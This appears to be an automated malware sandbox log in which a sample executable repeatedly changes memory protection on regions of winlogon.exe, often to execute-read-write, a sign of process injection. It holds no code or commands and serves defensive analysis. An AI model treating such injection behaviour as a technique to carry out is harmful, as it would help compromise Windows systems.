Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD1B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD39000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD3B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD59000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD5B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD79000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD7B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD99000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD9B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDB9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDBB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDD9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDDB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDF9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CDFB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE19000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE1B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE39000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE3B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE59000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE5B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE79000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE7B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE99000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE9B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEBB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CEC1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CED6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CED9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CEDB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CEE1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CEF6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CEF9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CEFB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF00000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF01000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF16000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF19000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF1B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF20000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF21000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF36000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF39000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF3B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF40000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF41000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF56000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF59000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF5B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF60000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF61000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF76000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF79000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF7B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF80000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF81000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF96000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF99000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CF9B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFA1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFB6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFB9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFBB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFC1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFD6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFD9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFDB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFE1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFF6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFF9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: CFFB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D000000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D001000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D016000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D019000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D01B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D020000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D021000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D036000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D039000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D03B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D040000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D041000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D056000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D059000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D05B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D060000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D061000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D076000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D079000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D07B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D080000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D081000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D096000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D099000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D09B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0A1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0B6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0B9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0BB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0C1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0D6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0D9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0DB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0E1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0F6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0F9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D0FB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D100000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D101000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D116000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D119000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D11B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D120000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D121000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D136000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D139000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D13B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D140000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D141000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D156000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D159000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D15B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D160000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D161000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D176000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D179000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D17B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D180000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D181000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D196000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D199000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D19B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1A1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1B6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1B9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1BB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1C1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1D6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1D9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1DB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1E1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1F6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1F9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D1FB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D200000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D201000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D216000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D219000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D21B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D220000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D221000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D236000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D239000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe; Memory protected: C:\Windows\System32\winlogon.exe base: D23B000 protect: page execute and read and write
